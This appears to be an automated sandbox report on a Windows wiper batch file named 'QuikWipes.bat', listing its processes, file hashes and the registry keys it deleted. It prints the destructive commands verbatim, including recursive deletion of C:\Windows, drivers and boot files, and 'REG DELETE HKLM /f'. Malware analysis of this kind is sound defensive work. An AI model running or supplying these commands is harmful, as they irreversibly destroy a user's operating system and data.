cmd.exe /k del /q /f /s C:\Users\Admin\AppData\Roaming\*

C:\Windows\system32\cmd.exe

cmd.exe /k del /q /f /s C:\WindowsBoot\*

C:\Windows\system32\cmd.exe

cmd.exe /k del /q /f /s C:\Windows\System32\winload.exe

C:\Windows\system32\cmd.exe

cmd.exe /k del /q /f /s C:\Windows\System32\BCD\*

C:\Windows\system32\cmd.exe

cmd.exe /k RMDIR C:\Windows\System32\BCD

C:\Windows\system32\reg.exe

REG DELETE HKLM /f

C:\Windows\system32\cmd.exe

cmd.exe /k del /q /f /s C:\Windows\System32\Drivers\*

C:\Windows\system32\cmd.exe

cmd.exe /k del /q /f /s C:\Windows\*

C:\Windows\explorer.exe

explorer.exe

C:\Windows\system32\taskkill.exe

taskkill /f /im cmd.exe

C:\Windows\explorer.exe

explorer.exe

C:\Windows\System32\taskkill.exe

taskkill /f /im cmd.exe

Network

N/A

Files

C:\Users\Admin\Desktop\HACKER3263090441406188493831651513646205699765139263210431490730429291.txt

MD5 a911b36535d43a8a9cd54b028ee92236
SHA1 74a5c2013b757dee646e9a2b480a1447fd96d1b3
SHA256 387bda4105dea0edb3d41b38538b9a302a029843d03dfee54724c78c0c241701
SHA512 61b767d5912eb1c3f677c0abf477d828328a39c55e5bee9c4e7336e5a5445020a6b8abfa706f4d8048da9927c0ad77fba4d748d1077bcedd6e3f49b8290e96e3

C:\Users\Admin\AppData\Local\Temp\21241256387603191375029289893030431015.FUCKYOULMAO

MD5 9644e3ba2ce9ddbf0d46353cae08a3d9
SHA1 95dc5c2c66f09a13b9a5c2a9d4f38cab5192febb
SHA256 7f02b3edbe11bef870bea79fda021ecfd6db8b1b307b51f1eae649d5549b60b0
SHA512 1ab5354c16fdc02b0ebc312d4e7e28579861b3172cdc2964c4e49796b1816dfe6c90b8bb4c82a7c506d4c940a6182e11dd446ee22b921285df3c03396e25823a

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-24 04:25

Reported

2024-05-24 04:29

Platform

win10v2004-20240426-en

Max time kernel

271s

Max time network

154s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\QuikWipes.bat"

Signatures

Adds autorun key to be loaded by Explorer.exe on startup

persistence
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad C:\Windows\system32\reg.exe N/A

Modifies firewall policy service

evasion
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static\System C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedInterfaces C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedInterfaces\IfIso C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\Mdm C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\Logging C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\Logging C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\Logging C:\Windows\system32\reg.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Security C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 C:\Windows\system32\reg.exe N/A

Manipulates Digital Signatures

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptsvcDllCtrl C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Certificate\{189A3842-3041-11D1-85E1-00C04FC295EE} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Certificate\{31D1ADC1-D329-11D1-8ED8-0080C76516C6} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{31D1ADC1-D329-11D1-8ED8-0080C76516C6} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\AggregateSSLHandshakeTime C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{0F5F58B3-AADE-4B9A-A434-95742D92ECEB} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.16.4 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{9BA61D3F-E73A-11D0-8CD2-00C04FC295EE} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Initialization C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Signature\{D41E4F1D-A407-11D1-8BC9-00C04FA30A41} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2009 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{DE351A43-8E59-11D0-8C47-00C04FC295EE} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2012 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{5598CFF1-68DB-4340-B57F-1CACF88C9A51} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{06C9E010-38CE-11D4-A2A3-00104BD35090} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2005 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedDevices C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{0AC5DF4B-CE07-4DE2-B76E-23C839A09FD1} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\DiagnosticPolicy\{573E31F8-DDBA-11D0-8CCB-00C04FC295EE} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\SystemCertificates\TrustedPublisher\Certificates C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2006 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{1A610570-38CE-11D4-A2A3-00104BD35090} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{0F5F58B3-AADE-4B9A-A434-95742D92ECEB} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{C689AABA-8E78-11D0-8C47-00C04FC295EE} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.4.3 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2001 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2012 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CertDllVerifyCTLUsage\DEFAULT C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CertDllProtectedRootMessageBox C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2005 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2221 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.16.1.1 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{DE351A43-8E59-11D0-8C47-00C04FC295EE} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.12 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{D41E4F1D-A407-11D1-8BC9-00C04FA30A41} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{CF78C6DE-64A2-4799-B506-89ADFF5D16D6} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Certificate\{F750E6C3-38EE-11D1-85E5-00C04FC295EE} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Cleanup\{FC451C16-AC75-11D1-B4B8-00C04FB66EA0} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{CF78C6DE-64A2-4799-B506-89ADFF5D16D6} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{000C10F1-0000-0000-C000-000000000046} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSealedDigest\{C689AABA-8E78-11D0-8C47-00C04FC295EE} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\CertCheck\{D41E4F1D-A407-11D1-8BC9-00C04FA30A41} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.25 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{5598CFF1-68DB-4340-B57F-1CACF88C9A51} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{CF78C6DE-64A2-4799-B506-89ADFF5D16D6} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{F750E6C3-38EE-11D1-85E5-00C04FC295EE} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\CRLs C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.12 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{64B9D180-8DA2-11CF-8736-00AA00A485EB} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{0AC5DF4B-CE07-4DE2-B76E-23C839A09FD1} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{CF78C6DE-64A2-4799-B506-89ADFF5D16D6} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.28 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\CTLs C:\Windows\system32\reg.exe N/A

Modifies Installed Components in the registry

persistence
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{E92B03AB-B707-11d2-9CBD-0000F87A369E} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{25FFAAD0-F4A3-4164-95FF-4461E9F35D51} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{3af36230-a269-11d1-b5bf-0000f8051515} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>{22d6f312-b0f6-11d0-94ab-0080c74c7e95} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{22d6f312-b0f6-11d0-94ab-0080c74c7e95} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{de5aed00-a4bf-11d1-9948-00c04f98bbc9} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{22d6f312-b0f6-11d0-94ab-0080c74c7e95} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{630b1da0-b465-11d1-9948-00c04f98bbc9} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{de5aed00-a4bf-11d1-9948-00c04f98bbc9} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{23A20C3C-2ADD-4A80-AFB4-C146F8847D79} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{FEBEF00C-046D-438D-8A88-BF94A6C9E703} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{45ea75a0-a269-11d1-b5bf-0000f8051515} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{5A604D2C-E968-429B-8327-62B5CE52126D} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{7790769C-0471-11d2-AF11-00C04FA35D02} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{2C7339CF-2B09-4501-B3F3-F3508C9228ED} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9381D8F2-0288-11D0-9501-00AA00B911A5} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{4f645220-306d-11d2-995d-00c04f98bbc9} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{A6EADE66-0000-0000-484E-7E8A45000000} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{C6BAF60B-6E91-453F-BFF9-D3789CFEFCDD} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{630b1da0-b465-11d1-9948-00c04f98bbc9} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{6fab99d0-bab8-11d1-994a-00c04f98bbc9} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{7790769C-0471-11d2-AF11-00C04FA35D02} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8F5D9E08-71EC-370E-BA96-36E6EF916DF2} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\>{22d6f312-b0f6-11d0-94ab-0080c74c7e95} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{E92B03AB-B707-11d2-9CBD-0000F87A369E} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{45ea75a0-a269-11d1-b5bf-0000f8051515} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{5fd399c0-a70a-11d1-9948-00c04f98bbc9} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{3af36230-a269-11d1-b5bf-0000f8051515} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4340} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{6fab99d0-bab8-11d1-994a-00c04f98bbc9} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{44BBA855-CC51-11CF-AAFA-00AA00B6015F} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{44BBA855-CC51-11CF-AAFA-00AA00B6015F} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{7C028AF8-F614-47B3-82DA-BA94E41B1089} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{9381D8F2-0288-11D0-9501-00AA00B911A5} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{CE4BC71D-A88B-4943-BB3D-AF9C0E7D4387} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{4f645220-306d-11d2-995d-00c04f98bbc9} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{5fd399c0-a70a-11d1-9948-00c04f98bbc9} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{990CB269-A600-38D0-B7D1-FBD392495F13} C:\Windows\system32\reg.exe N/A

Registers new Print Monitor

persistence
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\WSD Port\Ports C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Standard TCP/IP Port C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\USB Monitor C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\WSD Port\Adapters\WSPrint\OfflinePorts C:\Windows\system32\reg.exe N/A
